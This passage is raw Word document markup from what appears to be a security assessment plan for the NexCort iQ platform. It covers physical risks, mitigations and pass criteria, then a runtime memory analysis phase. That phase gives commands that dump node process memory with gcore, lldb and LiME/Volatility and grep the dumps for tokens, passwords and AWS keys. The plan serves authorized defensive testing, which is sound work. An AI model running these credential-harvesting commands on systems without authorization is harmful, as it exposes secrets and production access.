        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">NexCort iQ Specific Physical Risks</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20"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Unlocked workstation with AWS console</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Full production access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Screensaver lock ≤5min, MFA on AWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">USB drive with database export</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bulk customer data exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Disable USB mass storage, DLP policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Printed agency configuration with FIPS codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Target mapping for attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Shred all printed configs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Unattended dispatcher terminal at agency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Incident data access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Screen timeout + PIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Office WiFi network pivoting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Internal tool access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Separate guest/corp networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All workstations auto-lock after 5 minutes of inactivity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Full disk encryption confirmed on all engineer laptops</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No unencrypted credentials found in accessible files or printed materials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USB mass storage devices blocked on all RC-managed workstations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tailgating challenge rate above 90% in simulated test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 6 — Runtime Memory Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Runtime memory analysis examines the contents of running processes to extract secrets, credentials, session tokens, or cryptographic keys that are not visible in static code or stored on disk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Targets for NexCort iQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Developer workstations running aws-vault or SSO sessions with cached credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CI/CD runners (GitHub Actions, CodeBuild) that hold temporary AWS credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lambda execution environments — any secrets retrieved from Secrets Manager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Node.js processes on developer machines running the API locally</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools and Techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Linux Process Memory Dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Identify target process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pgrep -a node</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Dump process memory using gcore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">gcore -o /tmp/node-dump.core $(pgrep node)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Extract strings from dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">strings /tmp/node-dump.core | grep -iE 'secret|token|password|key|arn|cognito|ring|bearer'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Search for AWS credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">strings /tmp/node-dump.core | grep -E 'AKIA|ASIA|aws_access|aws_secret'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. macOS Memory Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Use lldb to attach to a running process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo lldb -p $(pgrep node)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># In lldb: read memory ranges containing string data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">memory find -s 'Bearer' -- 0x0 0xffffffff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Volatility — Full System Memory Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Capture memory image (requires root or hypervisor access)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo lime-linux.sh -p /tmp/memory.lime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Analyze with Volatility 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 vol.py -f /tmp/memory.lime linux.bash        # shell history</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
